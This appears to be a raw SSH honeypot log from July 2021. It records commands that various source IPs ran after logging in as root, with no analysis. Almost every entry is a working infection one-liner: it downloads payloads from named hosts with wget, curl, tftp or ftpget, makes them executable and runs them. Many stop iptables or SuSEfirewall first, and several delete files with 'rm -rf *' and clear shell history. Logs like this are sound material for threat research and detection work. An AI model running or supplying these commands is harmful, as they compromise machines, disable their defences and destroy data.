rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *

From 209.141.32.204 7-Jul-2021 14:26:10 ssh2 root
Exec uname -a
uname -a
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 7-Jul-2021 16:36:12 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *

From 209.141.53.60 7-Jul-2021 17:33:39 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/Oblivion121.sh; curl -O http://205.185.126.121/Oblivion121.sh; chmod 777 Oblivion121.sh; sh Oblivion121.sh; tftp 205.185.126.121 -c get tOblivion121.sh; chmod 777 tOblivion121.sh; sh tOblivion121.sh; tftp -r tOblivion1212.sh -g 205.185.126.121; chmod 777 tOblivion1212.sh; sh tOblivion1212.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh; sh Oblivion1211.sh; rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/Oblivion121.sh
curl -O http://205.185.126.121/Oblivion121.sh
chmod 777 Oblivion121.sh
sh Oblivion121.sh
tftp 205.185.126.121 -c get tOblivion121.sh
chmod 777 tOblivion121.sh
sh tOblivion121.sh
tftp -r tOblivion1212.sh -g 205.185.126.121
chmod 777 tOblivion1212.sh
sh tOblivion1212.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 Oblivion1211.sh Oblivion1211.sh
sh Oblivion1211.sh
rm -rf Oblivion121.sh tOblivion121.sh tOblivion1212.sh Oblivion1211.sh
rm -rf *

From 181.214.243.18 8-Jul-2021 07:54:53 ssh2 root
Exec id
id

From 205.185.119.224 8-Jul-2021 14:06:35 ssh2 root
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 209.141.53.60 8-Jul-2021 18:38:58 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cat /proc/cpuinfo | grep name | wc -l
cat /proc/cpuinfo | grep name | wc -l

From 124.156.154.191 9-Jul-2021 01:44:43 ssh2 root
ls bt

From 117.24.13.169 10-Jul-2021 12:02:15 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 server;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 server

From 117.24.13.169 10-Jul-2021 12:03:29 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 Sever64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 Sever64

From 117.24.13.169 10-Jul-2021 12:06:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/x64;chmod 777 x64;./x64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/x64
chmod 777 x64
./x64 Sever64

From 117.24.13.169 10-Jul-2021 12:22:51 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:33321/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:33321/txma
chmod 777 txma
./txma
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:33321/txma;chmod 777 txma;./txma;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:33321/txma
chmod 777 txma
./txma

From 117.24.13.169 10-Jul-2021 15:59:44 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/X64
chmod 777 X64
./X64 Sever64

From 117.24.13.169 10-Jul-2021 16:06:00 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/X64
chmod 777 X64
./X64 Sever64
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:2131/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:2131/X64
chmod 777 X64
./X64 Sever64

From 117.24.13.169 10-Jul-2021 16:30:01 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://a9.huhh.cn:81/X64;chmod 777 X64;./X64 Sever64;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://a9.huhh.cn:81/X64
chmod 777 X64
./X64 Sever64

From 117.24.13.169 10-Jul-2021 19:15:04 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.50.49.61:33321/SSS;chmod 777 SSS;./SSS;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.50.49.61:33321/SSS
chmod 777 SSS
./SSS

From 195.133.40.226 10-Jul-2021 20:52:01 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://apponline957.ir/vdht.sh; curl -O https://apponline957.ir/vdht.sh; chmod 777 vdht.sh; sh vdht.sh; rm -rf vdht.sh; history -c
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget https://apponline957.ir/vdht.sh
curl -O https://apponline957.ir/vdht.sh
chmod 777 vdht.sh
sh vdht.sh
rm -rf vdht.sh
history -c

From 222.186.52.198 11-Jul-2021 07:00:48 ssh2 root
Exec /etc/init.d/iptables stop
/etc/init.d/iptables stop
Exec /etc/init.d/iptables stop
/etc/init.d/iptables stop

From 117.24.13.169 11-Jul-2021 13:52:37 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/BOT/1;chmod 777 1;./1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/BOT/1
chmod 777 1
./1
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://1.117.4.172:999/BOT/1;chmod 777 1;./1;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://1.117.4.172:999/BOT/1
chmod 777 1
./1

From 180.215.192.123 12-Jul-2021 04:05:07 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/ABOC;chmod 777 ABOC;./ABOC;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/ABOC
chmod 777 ABOC
./ABOC
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/ABOC;chmod 777 ABOC;./ABOC;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/ABOC
chmod 777 ABOC
./ABOC

From 180.215.192.123 12-Jul-2021 04:09:33 ssh2 root
Exec tc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
tc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor
Exec tc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
tc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor

From 180.215.192.123 12-Jul-2021 04:27:30 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/linuxdoor;chmod 777 linuxdoor;./linuxdoor;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/linuxdoor
chmod 777 linuxdoor
./linuxdoor

From 180.215.192.123 12-Jul-2021 08:12:14 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/U;chmod 777 U;./U;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/U
chmod 777 U
./U

From 180.215.192.107 13-Jul-2021 01:57:35 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/aal.6;chmod 777 http://180.215.192.107:8080/aal.6;.http://180.215.192.107:8080/aal.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/aal.6
chmod 777 http://180.215.192.107:8080/aal.6
.http://180.215.192.107:8080/aal.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/aal.6;chmod 777 http://180.215.192.107:8080/aal.6;.http://180.215.192.107:8080/aal.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/aal.6
chmod 777 http://180.215.192.107:8080/aal.6
.http://180.215.192.107:8080/aal.6

From 180.215.192.107 13-Jul-2021 02:01:57 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Li2.4;chmod 777 Li2.4;./Li2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Li2.4
chmod 777 Li2.4
./Li2.4
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Li2.4;chmod 777 Li2.4;./Li2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Li2.4
chmod 777 Li2.4
./Li2.4

From 179.43.175.9 13-Jul-2021 03:35:59 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth
history -c

From 180.215.192.107 13-Jul-2021 12:30:33 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136:8080/x862;chmod 777 x862;./x862;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136:8080/x862
chmod 777 x862
./x862

From 180.215.192.107 13-Jul-2021 12:32:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136:8080/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136:8080/x86
chmod 777 x86
./x86
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://27.124.34.136:8080/x86;chmod 777 x86;./x86;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://27.124.34.136:8080/x86
chmod 777 x86
./x86

From 180.215.192.107 13-Jul-2021 12:37:43 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/Li2.4;chmod 777 Li2.4;./Li2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/Li2.4
chmod 777 Li2.4
./Li2.4

From 178.138.96.209 13-Jul-2021 17:40:45 ssh2 root
w
lscpu
ps aux
ping yahoo.com
cd /usr/lib
ls -a
ping yahoo.com
wget http://130.0.164.120/scan2.jpg
curl -O http://130.0.164.120/scan2.jpg
yum
ap-tget
apt-get
apt-get install curl
curl -O https://fs03n1.sendspace.com/dl/e6ee48506578b8ada941f5128eea50ce/60edc2220fc0e7ec/6jh0ab/euf.jpg
curl
/srl
find
findapt-get install slocate
apt-get install slocate
locate
ficd /home
ls -a
cd /home
ls -a
ls -a
halt

From 209.141.53.60 13-Jul-2021 22:52:30 ssh2 root
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *
Exec cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://205.185.126.121/8UsA.sh; curl -O http://205.185.126.121/8UsA.sh; chmod 777 8UsA.sh; sh 8UsA.sh; tftp 205.185.126.121 -c get t8UsA.sh; chmod 777 t8UsA.sh; sh t8UsA.sh; tftp -r t8UsA2.sh -g 205.185.126.121; chmod 777 t8UsA2.sh; sh t8UsA2.sh; ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh; sh 8UsA1.sh; rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh; rm -rf *
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget http://205.185.126.121/8UsA.sh
curl -O http://205.185.126.121/8UsA.sh
chmod 777 8UsA.sh
sh 8UsA.sh
tftp 205.185.126.121 -c get t8UsA.sh
chmod 777 t8UsA.sh
sh t8UsA.sh
tftp -r t8UsA2.sh -g 205.185.126.121
chmod 777 t8UsA2.sh
sh t8UsA2.sh
ftpget -v -u anonymous -p anonymous -P 21 205.185.126.121 8UsA1.sh 8UsA1.sh
sh 8UsA1.sh
rm -rf 8UsA.sh t8UsA.sh t8UsA2.sh 8UsA1.sh
rm -rf *

From 180.215.192.107 13-Jul-2021 23:25:23 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/7.6;chmod 777 7.6;./7.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/7.6
chmod 777 7.6
./7.6
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.107:8080/7.6;chmod 777 7.6;./7.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.107:8080/7.6
chmod 777 7.6
./7.6

From 180.215.192.123 14-Jul-2021 09:13:06 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/99.6;chmod 777 99.6;./99.6;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/99.6
chmod 777 99.6
./99.6

From 180.215.192.123 14-Jul-2021 09:20:50 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/Linux2.4;chmod 777 Linux2.4;./Linux2.4;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/Linux2.4
chmod 777 Linux2.4
./Linux2.4

From 222.186.52.198 14-Jul-2021 10:07:30 ssh2 root
Exec wget http://66.42.103.186/hang/armv4l;chmod +x armv4l;./armv4l server;wget http://66.42.103.186/hang/armv5l; chmod +x armv5l;./armv5l server;wget http://66.42.103.186/hang/armv7l;chmod +x armv7l;./armv7l server;wget http://66.42.103.186/hang/mips;chmod +x mips;./mips server;wget http://66.42.103.186/hang/mipsel;chmod +x mipsel;./mipsel server;
wget http://66.42.103.186/hang/armv4l
chmod +x armv4l
./armv4l server
wget http://66.42.103.186/hang/armv5l
chmod +x armv5l
./armv5l server
wget http://66.42.103.186/hang/armv7l
chmod +x armv7l
./armv7l server
wget http://66.42.103.186/hang/mips
chmod +x mips
./mips server
wget http://66.42.103.186/hang/mipsel
chmod +x mipsel
./mipsel server
Exec wget http://66.42.103.186/hang/armv4l;chmod +x armv4l;./armv4l server;wget http://66.42.103.186/hang/armv5l; chmod +x armv5l;./armv5l server;wget http://66.42.103.186/hang/armv7l;chmod +x armv7l;./armv7l server;wget http://66.42.103.186/hang/mips;chmod +x mips;./mips server;wget http://66.42.103.186/hang/mipsel;chmod +x mipsel;./mipsel server;
wget http://66.42.103.186/hang/armv4l
chmod +x armv4l
./armv4l server
wget http://66.42.103.186/hang/armv5l
chmod +x armv5l
./armv5l server
wget http://66.42.103.186/hang/armv7l
chmod +x armv7l
./armv7l server
wget http://66.42.103.186/hang/mips
chmod +x mips
./mips server
wget http://66.42.103.186/hang/mipsel
chmod +x mipsel
./mipsel server

From 179.43.175.9 14-Jul-2021 10:24:02 ssh2 root
Exec cat /etc/issue; cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget -q http://179.43.175.12/cometome; cat cometome > meth; chmod +x meth; chmod 777 *; ./meth; history -c
cat /etc/issue
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
wget -q http://179.43.175.12/cometome
cat cometome > meth
chmod +x meth
chmod 777 *
./meth
history -c

From 180.215.192.123 14-Jul-2021 11:58:26 ssh2 root
Exec /etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://180.215.192.123:8080/VIP;chmod 777 VIP;./VIP;
/etc/init.d/iptables stop
service iptables stop
SuSEfirewall2 stop
reSuSEfirewall2 stop
wget -c http://180.215.192.123:8080/VIP
chmod 777 VIP
./VIP

From 209.141.32.204 14-Jul-2021 12:04:59 ssh2 root
Exec cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm -rf ssh*; rm -rf .ssh*; wget 209.141.32.204/ssh || curl -o ssh 209.141.32.204/ssh; tar xvf ssh; cd .ssh; chmod +x *; ./sshd;./krane 1
cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
rm -rf ssh*
rm -rf .ssh*
wget 209.141.32.204/ssh || curl -o ssh 209.141.32.204/ssh
tar xvf ssh
cd .ssh
